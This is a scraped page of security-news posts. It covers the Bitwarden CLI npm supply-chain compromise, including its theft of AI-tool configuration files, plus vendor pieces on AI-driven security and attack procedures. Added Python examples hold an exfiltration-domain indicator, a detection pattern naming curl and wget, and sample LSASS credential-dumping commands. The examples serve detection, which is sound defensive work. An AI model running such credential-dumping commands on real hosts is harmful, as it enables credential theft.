Deep Mythos integration is on D3’s roadmap.</p> </blockquote><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">Related Resources</h2><ul class="wp-block-list"> <li><a href="https://d3security.com/resources/mythos-whitepaper/" type="d3-resource" id="61458">The Mythos Problem: 10,000 Zero-Days and the SOC That Can’t Keep Up</a></li> <li><a href="https://d3security.com/resources/mythos-nis2-eu-compliance/" type="d3-resource" id="61451">Mythos NIS2 Whitepaper</a></li> <li><a href="https://d3security.com/resources/nis2-compliance-for-the-ai-soc/" type="d3-resource" id="61311">NIS2 Compliance for the AI SOC</a></li> <li><a href="https://d3security.com/resources/mythos-eu-regulatory-comparison/" type="d3-resource" id="61474">EU Regulatory Comparison</a></li> <li><a href="https://d3security.com/solutions/autonomous-mythos-response/" type="page" id="61439">Autonomous Mythos Response</a></li> <li><a href="https://d3security.com/solutions/mythos-eu-ciso/" type="page" id="61441">Mythos Vulnerability Triage for EU CISOs</a></li> <li><a href="https://d3security.com/blog/nis2-soc-audit-readiness-2026/" type="post" id="61362">Belgium’s NIS2 Audit Window Opens April 18, 2026</a></li> <li><a href="https://d3security.com/faq/mythos-eu-compliance/" type="page" id="61521">EU FAQ</a></li> </ul><hr class="wp-block-separator has-alpha-channel-opacity"><p>The post <a href="https://d3security.com/blog/mythos-nis2-cra-dora-compliance/">When Mythos Finds Thousands of Zero-Days, EU Regulators Won’t Wait for Your SOC to Catch Up</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by D3 Security">D3 Security</a>. Read the original post at: <a href="https://d3security.com/blog/mythos-nis2-cra-dora-compliance/">https://d3security.com/blog/mythos-nis2-cra-dora-compliance/</a> </p>

Bitwarden CLI Compromise Linked to Ongoing Checkmarx Supply Chain Campaign

  • Jeffrey Burt
  • Published date: 2026-04-23 00:00:00

None

<p>The command line interface (CLI) of the popular Bitwarden open source password manager is the latest target of the ongoing Checkmarx supply chain campaign, with a threat group hijacking an npm package and injecting malicious code designed to steal sensitive data from developer workstations and CI environments.</p><p>Threat researchers from a number of cybersecurity vendors, including Socket, Ox Security, JFrog Security, and StepSecurity, detected and identified the compromised Bitwarden CLI version 2026.4.0. The bad actors targeted it after they <a href="https://socket.dev/blog/bitwarden-cli-compromised" target="_blank" rel="noopener">abused a GitHub Action</a> within Bitwarden’s CI/CD pipeline, according to the Socket Research Team.</p><p>The pattern was consistent with that seen in other targeted repositories in the Checkmarx campaign, the researchers <a href="https://socket.dev/blog/bitwarden-cli-compromised" target="_blank" rel="noopener">wrote in a report</a>.</p><p>The attack was also another example of the increasing <a href="https://devops.com/critical-microsoft-github-flaw-highlights-dangers-to-ci-cd-pipelines-tenable/" target="_blank" rel="noopener">cybersecurity risks to CI/CD architectures</a> as they become more foundational to the software development pipeline and threat actors expand their targeting of them in such supply chain attacks.</p><h3>A Popular Password Manager</h3><p>The Bitwarden password manager is used by more than 10 million people and more than 50,000 businesses, the Socket researchers wrote, adding that it ranks among the <a href="https://ramp.com/vendors/bitwarden" target="_blank" rel="noopener">top three password managers</a> adopted by enterprises, making it an attractive target for TeamPCP.</p><p>According to JFrog security researcher Meiter Palas, the package dropped by the attackers keeps the Bitwarden metadata intact but rewires the preinstall script and the CLI to a custom loader rather than the legitimate one.</p><p>“The loader downloads the bun 
runtime from GitHub if it is not already present, then launches a large obfuscated JavaScript payload,” Palas <a href="https://research.jfrog.com/post/bitwarden-cli-hijack/" target="_blank" rel="noopener">wrote in a report</a>. “Once deobfuscated, that payload reveals a broad credential theft operation focused on developer workstations and CI environments: GitHub and npm tokens, SSH material, shell history, AWS [Amazon Web Services], GCP [Google Cloud Platform], and Azure secrets, GitHub Actions secrets, and AI tooling configuration files are all targeted.”</p><h3>Targeting AI Tools</h3><p>Sai Likhith, a software engineer with StepSecurity, <a href="https://www.stepsecurity.io/blog/bitwarden-cli-hijacked-on-npm-bun-staged-credential-stealer-targets-developers-github-actions-and-ai-tools" target="_blank" rel="noopener">wrote</a> that the Bitwarden case “is the first npm compromise we have analyzed that explicitly enumerates Claude Code, Cursor, Kiro, Codex CLI, and Aider, treating ~/.claude.json and MCP server configs as first class exfiltration targets alongside cloud and source control secrets.”</p><p>Stolen data is encrypted with AES-256-GCM and exfiltrated to audit.checkmarx.cx, a registered domain used to impersonate Checkmarx so that the outbound connection would blend in with security telemetry, making it more difficult to detect, Likhith wrote. 
If a valid GitHub token was found, the malware weaponized it to enumerate repositories, steal Actions secrets, and inject malicious workflows into the repositories the token could reach, “turning a single compromised developer machine into a broader supply chain pivot point,” he wrote.</p><h3>Bitwarden Shuts It Down</h3><p>Bitwarden <a href="https://community.bitwarden.com/t/bitwarden-statement-on-checkmarx-supply-chain-incident/96127" target="_blank" rel="noopener">acknowledged</a> the malicious package, saying its security team identified and contained it and that it was distributed for a little more than 90 minutes on April 22, adding that the attack was connected with the broader Checkmarx incident.</p><p>The company wrote that no evidence was found to suggest that data in end users’ vaults was accessed or that production systems were compromised. Once detected, the compromised access was revoked, the malicious npm release deprecated, and remediation steps put into place.</p><p>The <a href="https://devops.com/sophisticated-supply-chain-attack-targeting-trivy-expands-to-checkmarx-litellm/" target="_blank" rel="noopener">ongoing supply chain campaign</a> has been underway for more than a month, with TeamPCP compromising <a href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/" target="_blank" rel="noopener">Aqua Security’s Trivy</a> open source vulnerability scanner and its associated GitHub Actions in March and then expanding later in the month to Checkmarx and LiteLLM.</p><h3>Attribution Is Difficult</h3><p>Socket researchers saw overlaps – such as shared tools – between the Checkmarx attack and the targeting of Bitwarden, adding that this “strongly suggests connection to the same malware ecosystem.” That said, attribution is complicated by differences in operational signatures. The attack on Checkmarx was claimed by TeamPCP on a particular social media account after it was discovered. 
In addition, the malware itself tried to blend in with seemingly legitimate connections, they wrote.</p><p>“This payload takes a different approach: the ideological branding is embedded directly in the malware, from the Shai-Hulud repository names to the ‘Butlerian Jihad’ manifesto payload to commit messages proclaiming resistance against machines,” Socket researchers wrote. “This suggests either a different operator using shared infrastructure, a splinter group with stronger ideological motivations, or an evolution in the campaign’s public posture.”</p><p>Ox Security researchers also <a href="https://www.ox.security/blog/shai-hulud-bitwarden-cli-supply-chain-attack/" target="_blank" rel="noopener">highlighted</a> the Shai-Hulud connection, noting that the string “Shai-Hulud: The Third Coming” was embedded in the Bitwarden package, writing that it indicates that “this is likely the next phase of the Shai-Hulud saga.”</p><p>The <a href="https://securityboulevard.com/2025/11/the-latest-shai-hulud-malware-is-faster-and-more-dangerous/" target="_blank" rel="noopener">self-propagating worm</a> emerged late last year, running through npm repositories in information-stealing supply chain attacks.</p><p>“Shai-Hulud is one of many supply chain attacks occurring in 2026, and this trend shows no signs of slowing as threat actors accumulate more credentials and compromise more developers,” the Ox Security researchers wrote. “Large-scale attacks through the NPM and PyPI registries could be avoided if stronger code review and guardrails were added during the package upload process. 
Failing to do so will only keep the door open for the next supply chain attack.”</p>
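As an added example (not code from Socket, JFrog, StepSecurity, Ox Security or Bitwarden), the following Python performs three defender-side checks that the reports above imply: finding the compromised release in an npm lockfile, flagging install-time lifecycle hooks in a package manifest, and matching egress proxy log lines against the impersonation domain. The npm package name `@bitwarden/cli`, the lockfile and manifest fragments and the proxy log lines are constructed assumptions; only the version 2026.4.0 and the domain audit.checkmarx.cx come from the reporting.

```python
"""Defender-side checks for the Bitwarden CLI npm compromise (added example, not
vendor code). Package name "@bitwarden/cli" is assumed; all sample data is constructed."""
import json
import re

# Indicators reported above: the compromised release and the lookalike domain
# registered to impersonate Checkmarx for exfiltration.
COMPROMISED_VERSIONS = {"@bitwarden/cli": {"2026.4.0"}}  # package name assumed
EXFIL_DOMAINS = {"audit.checkmarx.cx"}
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Install hooks that fetch remote content or a second runtime (the reported
# loader pulls the bun runtime from GitHub before running its payload).
FETCH_PATTERN = re.compile(r"https?://|\bcurl\b|\bwget\b|\bbun\b", re.IGNORECASE)
# Constructed proxy log format: "<timestamp> <src_ip> <method> <host><path> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>[^\s/]+)(?P<path>\S*) (?P<status>\d{3})$"
)


def find_compromised_packages(lockfile: dict) -> list[str]:
    """'name@version' for lockfile entries in COMPROMISED_VERSIONS (lockfile v1, v2 and v3)."""
    hits = set()
    for path, meta in lockfile.get("packages", {}).items():  # v2/v3: keyed by node_modules path
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if meta.get("version") in COMPROMISED_VERSIONS.get(name, set()):
            hits.add(f"{name}@{meta['version']}")
    for name, meta in lockfile.get("dependencies", {}).items():  # legacy v1 map
        if meta.get("version") in COMPROMISED_VERSIONS.get(name, set()):
            hits.add(f"{name}@{meta['version']}")
    return sorted(hits)


def suspicious_install_hooks(manifest: dict) -> list[dict]:
    """Report install-time lifecycle scripts in a package.json. The malicious release
    kept Bitwarden's metadata intact and rewired preinstall to a custom loader."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        reason = ("fetches remote content or runtime" if FETCH_PATTERN.search(command)
                  else "install-time hook present; verify it runs package-owned code only")
        findings.append({"hook": hook, "command": command, "reason": reason})
    return findings


def flag_exfil_connections(log_lines: list[str]) -> list[dict]:
    """Proxy log records whose host is (a subdomain of) an exfil domain. Suffix matching
    keeps the legitimate checkmarx.com apart from the lookalike checkmarx.cx."""
    flagged = []
    for line in log_lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # malformed line: skip rather than abort the sweep
        host = match.group("host").lower()
        if any(host == d or host.endswith("." + d) for d in EXFIL_DOMAINS):
            flagged.append({"ts": match.group("ts"), "src": match.group("src"), "host": host})
    return flagged


# Constructed sample inputs (not real artefacts from the incident).
SAMPLE_LOCKFILE = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "ci-tools", "version": "1.0.0"},
        "node_modules/@bitwarden/cli": {"version": "2026.4.0"},
        "node_modules/left-pad": {"version": "1.3.0"},
    },
}
SAMPLE_MANIFEST = {
    "name": "@bitwarden/cli",
    "version": "2026.4.0",
    "bin": {"bw": "./build/bw.js"},
    "scripts": {"preinstall": "node ./build/loader.js"},  # stand-in for the custom loader
}
SAMPLE_PROXY_LOG = [
    "2026-04-22T14:01:07Z 10.20.30.40 GET registry.npmjs.org/@bitwarden%2fcli 200",
    "2026-04-22T14:01:09Z 10.20.30.40 GET checkmarx.com/ 200",
    "2026-04-22T14:01:12Z 10.20.30.40 GET github.com/example-bun-release 302",
    "2026-04-22T14:01:20Z 10.20.30.40 POST audit.checkmarx.cx/ 200",
    "not a log line",
]


def run_checks(lockfile: dict, manifest: dict, log_lines: list[str]) -> dict:
    """One report combining all three checks, ready for a SOC queue."""
    return {
        "compromised_packages": find_compromised_packages(lockfile),
        "install_hooks": suspicious_install_hooks(manifest),
        "exfil_connections": flag_exfil_connections(log_lines),
    }


if __name__ == "__main__":
    print(json.dumps(run_checks(SAMPLE_LOCKFILE, SAMPLE_MANIFEST, SAMPLE_PROXY_LOG), indent=2))
```

Point `find_compromised_packages` at every package-lock.json in your CI runners and developer images, and feed `flag_exfil_connections` the egress logs for the 90-minute window Bitwarden reported; a hit on either is a reason to rotate the GitHub, npm and cloud credentials the quoted researchers list.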

Why Chrome Zero-Days Keep Winning and What Enterprises Need to Change – Blog | Menlo Security

  • None
  • Published date: 2026-04-23 00:00:00

None

<p>The post <a href="https://www.menlosecurity.com/blog/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change">Why Chrome Zero-Days Keep Winning and What Enterprises Need to Change – Blog | Menlo Security</a> appeared first on <a href="https://www.menlosecurity.com">Menlo Security Blog</a>.</p><p>Fourth Chrome zero-day of 2026 exposes a bigger issue: patching is too slow. Learn why browser isolation is key to preventing modern attacks. </p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.menlosecurity.com">Menlo Security Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Menlo Security Blog">Menlo Security Blog</a>. Read the original post at: <a href="https://www.menlosecurity.com/blog/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change">https://www.menlosecurity.com/blog/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change</a> </p>

Copperhelm Emerges to Launch Autonomous Cloud Security Platform

  • Michael Vizard
  • Published date: 2026-04-23 00:00:00

None

<p>Copperhelm today emerged from stealth to launch a platform that aggregates cloud security data to enable its artificial intelligence (AI) agents to autonomously monitor cloud environments, investigate threats and automatically remediate issues in real time.</p><p>Fresh off raising $7 million in funding, Copperhelm CEO Shimon Tolts said the company has developed a Context Lake that normalizes cloud security data in a way that enables AI agents to perform those tasks. The Copperhelm platform includes specialized AI agents that perform network analysis, analyze system behavior, simulate attacks and automatically mitigate issues. The Copperhelm agents connect directly to live workloads, inspect active processes and container images, map cloud network topology and deploy, for example, a web application firewall (WAF) if needed, without any downtime being required.</p><p>In general, cloud computing environments are highly complex and fragmented, making it difficult for AI tools to access and understand the context needed to ensure security is maintained. In organizations that have hundreds of cloud accounts, there needs to be a context engine that organizes all the metadata and configuration information that enables an AI agent to perform specific security tasks, said Tolts.</p><p>Armed with those insights, it then becomes possible to deploy a series of AI agents that collaboratively perform security functions spanning discovery to remediation, noted Tolts. 
That closed-loop approach makes it possible to manage cloud security at the level of scale that will be required to cope with the tsunami of vulnerabilities that will be discovered in the AI era, he added.</p><p>That tsunami is being driven first by AI coding tools that are generating more vulnerabilities faster than ever and more advanced AI models that are <a href="https://securityboulevard.com/2026/04/the-day-the-security-music-died/" target="_blank" rel="noopener">capable of discovering what are likely to become thousands of new zero-day vulnerabilities in existing legacy systems</a>. Once discovered, it now takes less than a day for cybercriminals using AI tools to create an exploit, noted Tolts.</p><p>While humans will still be needed to supervise AI agents, it’s not going to be feasible for cybersecurity teams to respond to issues that are occurring with greater frequency at machine speed. In effect, cybersecurity teams are now caught up in an AI arms race they can only win by investing more in AI to thwart cyberattacks that, thanks to AI, are only going to increase in volume and sophistication, said Tolts.</p><p>The challenge, of course, is explaining to business and IT leaders why the bulk of previous cybersecurity investments are rapidly becoming obsolete. While the total cost of cybersecurity might decline in the age of AI as more functions are automated, there is still going to be a need for an initial investment in new tools and platforms.</p><p>Hopefully, AI will benefit defenders more than attackers, but in the meantime, cybersecurity is in a state of flux. 
Unfortunately, it may yet require a few high-profile cyberattacks enabled by AI before business leaders fully appreciate how fundamentally and permanently the scope of threats facing the organization has changed.</p>

What We Mean by Procedures (And Why Precision Matters)

  • None
  • Published date: 2026-04-23 00:00:00

None

<p>The post <a href="https://www.tidalcyber.com/blog/what-we-mean-by-procedures-and-why-precision-matters">What We Mean by Procedures (And Why Precision Matters)</a> appeared first on <a href="https://www.tidalcyber.com/blog">Tidal Cyber Blog</a>.</p><article class="blog-post" morss_own_score="10.0" morss_score="13.0"> <h2>Why Terminology Confusion Still Undermines Modern Defense</h2> <p><span>Cybersecurity discussions are filled with familiar language. Security teams talk about the latest threats and threat landscape, attack techniques and behavior, adversary tradecraft, and detection coverage. These terms appear constantly in threat intelligence reports, product documentation, and security strategy conversations.</span> </p> <p><span>Yet despite their frequent use, they are not always used precisely. In many cases, security teams use terms like “behavior,” “techniques,” and “procedures” interchangeably. This creates an important problem. When the language used to describe threats becomes imprecise, the defenses built to stop those threats can become imprecise as well.</span> </p> <p><span>At a top level, the majority of organizations know that their adversaries work in patterns. They are aware that attackers do reconnaissance, access, escalate privileges, laterally move, and steal data. Models like MITRE ATT&amp;CK have proven useful as a framework in structuring these ideas and offering a common taxonomy.</span> </p> <p><span>However, knowing that an adversary might perform “lateral movement” or “credential dumping” does not mean a security team understands how that activity actually unfolds in its own environment. 
Techniques are abstract accounts of attacker behavior and can be helpful for categorization, but they do not necessarily lead to actionable defenses.</span> </p> <p><span>The difference between conceptual and operational threat understanding and defense is often reduced to a single element: procedural precision.</span> </p> <p><span>Procedures define how attacks are actually executed capturing the specific steps, tools, and sequences adversaries use. Without this detail, teams may know what attackers can do, but not how they do it in order to disrupt the attack.</span> </p> <h2><span>Techniques Describe Possibility. Procedures Describe Execution</span> </h2> <p><span>To explain why the procedures are important, it is useful to clarify the distinction among a few terms frequently used in cybersecurity.</span> </p> <p><span>“Adversary behavior” is a general term to describe how attackers operate across campaigns such as gaining access, escalating privileges, or maintaining persistence. Techniques provide a standardized way to represent that behavior, defining the common methods adversaries use to achieve objectives (e.g., spearphishing for initial access or token theft for credential abuse). These techniques help defenders consistently map threats to controls. </span> </p> <p><span>However, techniques describe what attackers do at an abstract level, not how they actually execute attacks in a real environment. That level of detail is captured in procedures, which define the step-by-step executions, tools, and sequences used by adversaries in the wild.</span> </p> <h4><strong><span>Procedures </span></strong><strong><span>operate at a different</span></strong><strong><span> level.</span></strong> </h4> <p><span>A procedure describes how an attack is actually carried out in practice. 
It captures specific commands, scripts, tools, and sequence of actions an adversary uses to execute a technique.</span> </p> <p><span>Consider the example of credential theft:</span></p> <p><span>A technique might define credential dumping as a method for extracting account credentials from memory. This helps defenders understand the type of activity that may occur.</span> </p> <p><span>A procedure, however, shows exactly how that activity is performed. It includes the specific tool used, the command syntax executed on a host, the privileges required, and the sequence of steps the attacker follows to achieve the outcome.</span> </p> <h4>The distinction is subtle but critical.</h4> <h4>Techniques describe the possibility of an attack.</h4> <h4><span>Procedures describe the reality of how that attack is executed.</span> </h4> <p><span>For defenders, that difference determines whether a control can truly detect or stop the activity in practice, not just in theory.</span> </p> <h2>Why Abstraction Breaks Down in Real Security Operations</h2> <p><span>Describing threats abstractly can be beneficial when it comes to organizing knowledge, but can be dangerous when relied upon as the primary basis for planning your cybersecurity defenses.</span> </p> <p><span>Many organizations build detection coverage around techniques. Security teams map their controls to techniques listed in security frameworks and assume that this mapping provides adequate defensive coverage.</span> </p> <p><span>In practice, this assumption often falls short. Techniques are abstract and can be executed in many different ways. The same objective can be achieved through multiple variations of executions, and a detection built for one approach may completely miss another. For example, an organization might deploy multiple detections designed to identify lateral movements. 
These designs might be configured to identify specific network events or authentication patterns commonly seen with a known attack path. However, the moment an adversary changes their sequence of commands, implements a different protocol, or employs a different toolset, they can bypass the designs.</span> </p> <p><span>From the perspective of a dashboard or coverage report, the organization appears well protected. Multiple detections exist for the relevant technique, and the security team has mapped its controls accordingly.</span> </p> <p><span>From the perspective of an adversary executing a real attack procedure, the environment may remain largely unmonitored.</span> </p> <p><span>This is one of the central challenges of abstraction in cybersecurity. Aligning defenses to generalized techniques instead of actual adversary procedures can make coverage appear stronger than it actually is.</span> </p> <p><span>Security teams may believe they have mitigated a threat, but in reality, they’ve only addressed a limited set of the procedures through which that threat can be carried out.</span> </p> <h2>Procedural Precision Changes How Defenses Are Prioritized</h2> <p><span>Procedural accuracy alters how organizations think about defensive priorities.</span> </p> <p><span>Without procedural insight, prioritization often becomes generic. Security teams attempt to cover as many techniques as possible across a wide range of potential threats. 
Resources are allocated broadly, and detection rules accumulate over time.</span> </p> <p><span>The result is frequently a large collection of controls that are difficult to evaluate and even harder to prioritize.</span> </p> <p><strong><span>A procedure-led approach shifts from abstra</span></strong><strong><span>ct possibilities to how attacks are executed in practice.</span></strong><span> By understanding the specific procedures adversaries use in real-world campaigns, especially those targeting similar industries, security teams can make more precise and informed defensive decisions. Instead of preparing for hypothetical scenarios, they can prioritize defenses against the way attacked are actually carried out. </span> </p> <p><span>That shift delivers several key advantages:</span> </p> <p><strong><span>First, it increases relevance.</span></strong><span> Defenses are aligned to observed adversary tradecraft, grounded in how attacks are executed in real environments, not theoretical scenarios.</span> </p> <p morss_own_score="7.0" morss_score="10.0"><strong><span>Second, it simplifies decision making. 
</span></strong><span>Rather than managing large volumes of generalized detections, teams can focus on the specific behaviors and execution patterns that matter most.</span> </p> <p morss_own_score="7.0" morss_score="10.5"><strong><span>Third, it improves the effectiveness of security investments.</span></strong><span> Rather than managing large volumes of generalized detections, teams can focus on the specific behaviors and execution patterns that matter most.</span> </p> <h4><span>Ultimately, procedural precision enables organizations to move from broad, generalized coverage to defenses that are intentionally aligned to how attacks actually happen.</span> </h4> <h2><span>From Threat Intelligence to Actionable Defensive Validation</span> </h2> <p><span>Threat intelligence plays an important role in modern security operations, but its value depends on how it is operationalized.</span> </p> <p><span>Adversary campaigns, techniques, and infrastructure that are used in attacks are usually described in threat reports. This information will assist organizations in understanding the evolving threat landscape and emerging threats.</span> </p> <p><span>Nevertheless, the intelligence kept at a conceptual level is hardly translated into defensive action. Procedures bridge the gap between threat intelligence and operational defense.</span> </p> <p><span>The procedural level of threat intelligence analysis enables the extraction of the actual steps adversaries follow to carry out attacks. These processes may then be applied to determine the ability of the available defenses to detect or prevent such actions.</span> </p> <p><span>Teams of security experts can simulate adversaries’ actions in controlled settings and observe how their surveillance measures respond. 
Detection logic can be evaluated against real execution patterns rather than theoretical threat models.</span> </p> <p><span>This type of validation provides far more meaningful feedback than technique-level mapping alone. It allows defenders to determine whether a control actually works against the tradecraft used by real attackers.</span> </p> <p><span>As a result, threat intelligence becomes procedure-led and evolves from a source of information into a driver of measurable defensive improvement.</span> </p> <h2>Measuring Security Outcomes Through Procedural Testing</h2> <p><span>The fact that procedural analysis helps to promote quantifiable security results is one of the greatest benefits of this methodology.</span> </p> <p><span>Conventional measures of security are activity oriented. Organizations quantify the number of alerts raised, controls implemented, or vulnerabilities repaired within a specific time frame. These are measures of operational effort, but not of defensive effectiveness.</span> </p> <p><span>Procedural testing leads to more evidence-based practice.</span> </p> <p><span>Organizations can assess their defenses against known adversary procedures to determine the effectiveness of their detection capabilities. Security teams can map defenses against procedures to determine whether they can defend against an attack or fail.</span> </p> <p><span>This produces metrics that directly relate to defensive capability.</span> </p> <p><span>For example, instead of reporting how many new controls were deployed in a quarter, a security team can report how many adversary procedures targeting their industry have been successfully detected and disrupted.</span> </p> <p><span>This kind of measurement shifts the discourse of cybersecurity performance. 
Security leaders can demonstrate the performance of defenses against real threats rather than abstract risk models.</span> </p> <p><span>The executives will have a better understanding of whether their security investments are performing and measure the reduction of attacker success and residual risk.</span> </p> <h2>Procedures as the Foundation of Threat-Led Defense</h2> <p><span>Adversaries are increasingly active and adaptive. Their campaigns evolve rapidly, adjusting to defensive controls as they encounter them. Defenses built on abstraction alone struggle to keep pace in this environment.</span> </p> <p><span>Techniques remain valuable for organizing knowledge and communicating threat categories. However, effective defense ultimately depends on understanding how those techniques are executed in real attacks. Procedures capture that execution. <span>They reveal the tools, commands, and sequences adversaries use to carry out attacks in practice.</span></span> </p> <p><span>When defenses are aligned to those procedures, organizations can assess their security posture against real-world attack patterns. Detection logic can be validated against concrete execution paths rather than theoretical assumptions.</span> </p> <p><span>This is the foundation of Threat-Led Defense. 
Instead of focusing solely on attack categories or abstract behaviors, defenses are grounded in the specific procedures adversaries use in practice.</span> </p> <p><span>For security teams, the shift is straightforward but powerful</span><span>:</span> </p> <p><strong><span>It means moving from knowing what adversaries might do to </span></strong><strong><span>prove</span></strong><strong><span> that defenses can stop what </span></strong><strong><span>they</span></strong><strong><span> actually do.</span></strong> </p> <p><span>In modern cybersecurity, that level of precision turns confidence from assumption into evidence.</span> </p> <h2>Conclusion</h2> <p>Tidal Cyber is the first true Threat-Led Defense platform built to flip the traditional defensive model by putting real adversary behavior at the center of your defense strategy.</p> <p>By mapping techniques, sub-techniques, and procedures to ATT&amp;CK, we reveal exactly where you’re exposed and how attackers actually operate. It’s a level of precision you’ve never had before, empowering your security team to proactively reduce risk and optimize high-impact security investments.</p> <p>Threat-Led Defense is Tidal Cyber’s unique implementation of Threat-Informed Defense, enhanced with procedure-level granularity to make CTI more relevant and actionable.</p> <p></p> </article><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/what-we-mean-by-procedures-and-why-precision-matters/" data-a2a-title="What We Mean by Procedures (And Why Precision Matters)"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" 
title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.tidalcyber.com/blog">Tidal Cyber Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tidal Cyber">Tidal Cyber</a>. 
Read the original post at: <a href="https://www.tidalcyber.com/blog/what-we-mean-by-procedures-and-why-precision-matters">https://www.tidalcyber.com/blog/what-we-mean-by-procedures-and-why-precision-matters</a> </p>
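The Tidal Cyber post above argues that a technique-level coverage map can say "covered" while most real procedures for that technique go undetected, and that the useful metric is how many procedures a control actually catches. The following Python is an added example written for this page, not Tidal Cyber's code or platform. It runs three constructed procedures for one technique (LSASS memory dumping, ATT&CK T1003.001) through a set of detection rules and reports both views. The command lines are simplified stand-ins for publicly documented variants; "svc.exe" is a hypothetical renamed copy of procdump; the detection rules and their names are assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Sequence, Tuple


@dataclass(frozen=True)
class Event:
    """One process-creation record (constructed, not real telemetry)."""
    process: str
    cmdline: str


@dataclass(frozen=True)
class Procedure:
    """A concrete way of executing a technique, expressed as the events it produces."""
    proc_id: str
    technique: str
    events: Sequence[Event]


@dataclass(frozen=True)
class Detection:
    """A detection rule mapped to a technique, as it would appear on a coverage dashboard."""
    name: str
    technique: str
    fires: Callable[[Event], bool]


# Three constructed procedures for one technique. Command lines are simplified stand-ins
# for well-known variants; P3 is the same tool as P1 under a hypothetical renamed binary.
PROCEDURES = [
    Procedure("P1-procdump", "T1003.001",
              [Event("procdump.exe", "procdump.exe -accepteula -ma lsass.exe C:\\temp\\l.dmp")]),
    Procedure("P2-comsvcs", "T1003.001",
              [Event("rundll32.exe",
                     "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\temp\\l.dmp full")]),
    Procedure("P3-renamed-procdump", "T1003.001",
              [Event("svc.exe", "svc.exe -accepteula -ma lsass.exe C:\\temp\\l.dmp")]),
]


def _cmd_has(event: Event, *needles: str) -> bool:
    low = event.cmdline.lower()
    return all(n in low for n in needles)


# Rules as a team might have them today; on a dashboard both are "mapped to T1003.001".
BASELINE_DETECTIONS = [
    Detection("procdump_targets_lsass", "T1003.001",
              lambda e: e.process.lower() == "procdump.exe" and _cmd_has(e, "lsass")),
    Detection("comsvcs_minidump", "T1003.001",
              lambda e: _cmd_has(e, "comsvcs.dll", "minidump")),
]

# One extra rule written from the procedure (the arguments used) rather than the tool name.
HARDENED_DETECTIONS = BASELINE_DETECTIONS + [
    Detection("any_binary_dumps_lsass", "T1003.001",
              lambda e: _cmd_has(e, "lsass") and re.search(r"(^|\s)-ma(\s|$)", e.cmdline) is not None),
]


def technique_coverage(detections: Sequence[Detection], techniques: Sequence[str]) -> Dict[str, bool]:
    """What a coverage dashboard reports: a technique is 'covered' if any rule maps to it."""
    mapped = {d.technique for d in detections}
    return {t: t in mapped for t in techniques}


def procedure_coverage(detections: Sequence[Detection], procedures: Sequence[Procedure]) -> Dict[str, List[str]]:
    """What procedural testing reports: per procedure, which rules actually fire on its events."""
    report: Dict[str, List[str]] = {}
    for p in procedures:
        relevant = [d for d in detections if d.technique == p.technique]
        report[p.proc_id] = sorted({d.name for d in relevant for e in p.events if d.fires(e)})
    return report


def procedures_detected(detections: Sequence[Detection], procedures: Sequence[Procedure]) -> Tuple[int, int]:
    """Outcome metric from the post: how many procedures at least one control catches."""
    cov = procedure_coverage(detections, procedures)
    return sum(1 for hits in cov.values() if hits), len(procedures)


if __name__ == "__main__":
    techs = sorted({p.technique for p in PROCEDURES})
    print("technique view :", technique_coverage(BASELINE_DETECTIONS, techs))
    print("procedure view :", procedure_coverage(BASELINE_DETECTIONS, PROCEDURES))
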